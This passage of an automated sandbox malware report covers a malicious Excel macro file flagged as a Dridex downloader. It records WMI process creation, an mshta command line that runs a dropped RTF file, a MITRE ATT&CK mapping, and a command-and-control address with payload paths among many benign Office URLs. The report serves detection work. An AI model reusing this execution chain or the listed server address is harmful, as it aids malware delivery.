      Source: C:\Windows\SysWOW64\wbem\WMIC.exe; WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\{187B63E3-42BF-4F73-8464-706D5F27E7FF} - OProcSessId.dat
      Source: classification engine; Classification label: mal100.troj.expl.evad.winXLSM@7/8@0/1
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File read: C:\Users\desktop.ini
      Source: C:\Windows\System32\mshta.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
      Source: Window Recorder; Window detected: More than 3 window changes detected
      Source: 56449657.xlsm; Initial sample: OLE zip file path = xl/media/image1.png
      Source: 56449657.xlsm; Initial sample: OLE zip file path = docProps/custom.xml
      Source: 1E850000.0.dr; Initial sample: OLE zip file path = xl/media/image1.png
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File opened: C:\Windows\SysWOW64\MSVCR100.dll

      Persistence and Installation Behavior:

      Creates processes via WMI
      Source: C:\Windows\SysWOW64\wbem\WMIC.exe; WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

      Hooking and other Techniques for Hiding and Protection:

      Creates and opens a fake document (probably a fake document to hide exploiting)
      Source: C:\Windows\System32\wbem\WmiPrvSE.exe; Process created: cmd line: vqcmninbaoojc.rtf
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Process created: cmd line: vqcmninbaoojc.rtf
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exe; Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wbem\WmiPrvSE.exe; Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exe; Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exe TID: 6052; Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
      Source: mshta.exe, 00000011.00000002.928321298.00000269D5577000.00000004.00000020.sdmp, mshta.exe, 00000011.00000003.857655477.00000269D5579000.00000004.00000001.sdmp; Binary or memory string: Hyper-V RAWpO
      Source: EXCEL.EXE, 00000000.00000002.930031050.000000000D9B4000.00000004.00000001.sdmp; Binary or memory string: Hyper-V RAWpR
      Source: EXCEL.EXE, 00000000.00000003.801049819.000000000F88C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.801017149.000000000F860000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787281711.000000000F860000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.932447949.000000000F860000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742785503.000000000F860000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787311248.000000000F88C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.932505798.000000000F88C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742840890.000000000F88C000.00000004.00000001.sdmp, mshta.exe, 00000011.00000002.929690383.00000271D990C000.00000004.00000001.sdmp, mshta.exe, 00000011.00000003.857731341.00000271D990C000.00000004.00000001.sdmp, mshta.exe, 00000011.00000003.857862913.00000271D990D000.00000004.00000001.sdmp; Binary or memory string: Hyper-V RAW
      Source: C:\Windows\System32\wbem\WmiPrvSE.exe; Process created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\vqcMnINBAOOJC.rtf
      Source: Yara match; File source: app.xml, type: SAMPLE
      Source: EXCEL.EXE, 00000000.00000002.928698647.0000000002F90000.00000002.00020000.sdmp, mshta.exe, 00000011.00000002.928542745.00000269D5950000.00000002.00020000.sdmp; Binary or memory string: Program Manager
      Source: EXCEL.EXE, 00000000.00000002.928698647.0000000002F90000.00000002.00020000.sdmp, mshta.exe, 00000011.00000002.928542745.00000269D5950000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd
      Source: EXCEL.EXE, 00000000.00000002.928698647.0000000002F90000.00000002.00020000.sdmp, mshta.exe, 00000011.00000002.928542745.00000269D5950000.00000002.00020000.sdmp; Binary or memory string: Progman
      Source: EXCEL.EXE, 00000000.00000002.928698647.0000000002F90000.00000002.00020000.sdmp, mshta.exe, 00000011.00000002.928542745.00000269D5950000.00000002.00020000.sdmp; Binary or memory string: Progmanlock

      Mitre Att&ck Matrix

      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
      Valid Accounts | Windows Management Instrumentation 21 | Path Interception | Process Injection 2 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 1 | Remote Services | Email Collection 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
      Default Accounts | Scripting 3 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion 1 | LSASS Memory | Virtualization/Sandbox Evasion 1 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Non-Standard Port 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
      Domain Accounts | Exploitation for Client Execution 22 | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools 1 | Security Account Manager | Process Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 2 | NTDS | File and Directory Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol 1 | SIM Card Swap | | Carrier Billing Fraud
      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting 3 | LSA Secrets | System Information Discovery 4 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol 1 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings

      Behavior Graph

      [Behavior graph: ID 532311, Sample: 56449657.xlsm, Startdate: 02/12/2021, Architecture: WINDOWS, Score: 100. Signatures: Multi AV Scanner detection for submitted file; Sigma detected: TA505 Dropper Load Pattern; Yara detected Dridex Downloader; 7 other signatures. EXCEL.EXE drops C:\Users\user\Desktop\~$56449657.xlsm, C:\Users\user\Desktop\56449657.xlsm (copy) and C:\ProgramData\vqcMnINBAOOJC.rtf (HTML), creates and opens a fake document, and starts WMIC.exe (Creates processes via WMI), which starts conhost.exe. WmiPrvSE.exe starts mshta.exe, which contacts 157.230.250.107, 49826, 8080 (DIGITALOCEAN-ASNUS, United States).]


      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      Source | Detection | Scanner | Label | Link
      56449657.xlsm | 13% | ReversingLabs | Document-Word.Trojan.Heuristic |

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs


      Domains and IPs

      Contacted Domains

      No contacted domains info

      URLs from Memory and Binaries

      Name | Source | Malicious | Antivirus Detection | Reputation
                                                            high
                                                            https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                              high
                                                              http://weather.service.msn.com/data.aspxEXCEL.EXE, 00000000.00000003.782352963.000000001314F000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                high
                                                                https://substrate.office.comPEXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosEXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                  high
                                                                  https://login.windows.net/common/oauth2/authorizeHT1EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlEXCEL.EXE, 00000000.00000003.787102445.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807889222.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662721741.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.933958853.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782581219.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743536985.000000001325D000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                      high
                                                                      https://login.windows.net/common/oauth2/authorizebEXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        https://outlook.office.com(EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        low
                                                                        https://wus2.contentsync.EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://clients.config.office.net/user/v1.0/ios7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                          high
                                                                          https://login.windows.net/common/oauth2/authorizeXKAEXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            https://o365auditrealtimeingestion.manage.office.comEXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                              high
                                                                              https://outlook.office365.com/api/v1.0/me/Activities7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                                high
                                                                                https://login.windows.net/common/oauth2/authorizePEXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  https://clients.config.office.net/user/v1.0/android/policies7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                                    high
                                                                                    https://api.diagnosticssdf.office.comUEXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://analysis.windows.net/powerbi/apiTEXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      https://entitlement.diagnostics.office.com7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                                        high
                                                                                        https://login.windows.net/common/oauth2/authorizenREXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          https://login.windows.net/common/oauth2/authorizeCS0EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonEXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                                              high
                                                                                              https://dataservice.o365filterEXCEL.EXE, 00000000.00000003.782352963.000000001314F000.00000004.00000001.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://outlook.office.com/EXCEL.EXE, 00000000.00000002.933997365.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782673322.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662745522.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787123980.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743580229.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807929408.000000001328A000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                                                high
                                                                                                https://storage.live.com/clientlogs/uploadlocationEXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                                                  high
                                                                                                  http://157.230.250.107:8080/mfkrmothRmshta.exe, 00000011.00000002.928213340.00000269D5515000.00000004.00000020.sdmp, mshta.exe, 00000011.00000003.857806201.00000269D5515000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://login.windows.net/common/oauth2/authorizeBEXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    https://dataservice.protection.outlEXCEL.EXE, 00000000.00000002.933748369.0000000013149000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782352963.000000001314F000.00000004.00000001.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://substrate.office.com/search/api/v1/SearchHistoryEXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                                                      high
                                                                                                      https://login.windows.net/common/oauth2/authorize?EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        https://analysis.windows.net/powerbi/api1EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          https://graph.windows.net/7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                                                            high
                                                                                                            https://devnull.onenote.comEXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                                                              high
                                                                                                              https://login.windows.net/common/oauth2/authorizeO6EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://157.230.250.107:8080/mfkrmothermshta.exe, 00000011.00000002.928213340.00000269D5515000.00000004.00000020.sdmp, mshta.exe, 00000011.00000003.857806201.00000269D5515000.00000004.00000001.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://login.windows.net/common/oauth2/authorize(EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  https://messaging.office.com/EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                                                                    high
                                                                                                                    http://157.230.250.107:8080/mfkrmotherfuckemshta.exe, 00000011.00000002.928213340.00000269D5515000.00000004.00000020.sdmp, mshta.exe, 00000011.00000003.857806201.00000269D5515000.00000004.00000001.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://cortana.aiZEXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://outlook.office365.com/autodiscover/autodiscover.jsonaBEXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                                                                        high
                                                                                                                        https://skyapi.live.net/Activity/EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
https://login.windows-ppe.net/common/oauth2/authorizesR | EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp | false | | high
